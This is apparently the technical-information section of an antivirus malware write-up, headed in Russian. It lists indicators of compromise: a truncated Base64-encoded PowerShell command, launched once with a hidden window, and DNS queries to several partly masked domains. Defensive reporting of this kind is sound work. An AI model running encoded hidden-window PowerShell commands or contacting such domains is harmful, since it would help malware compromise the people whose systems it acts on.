Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQA...
- DNS ASK sk###bali.com
- DNS ASK ch######ansxpressinc.com
- DNS ASK ac####heroof.com
- DNS ASK dg####amonique.com
- DNS ASK aa###ndia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQA...' (со скрытым окном)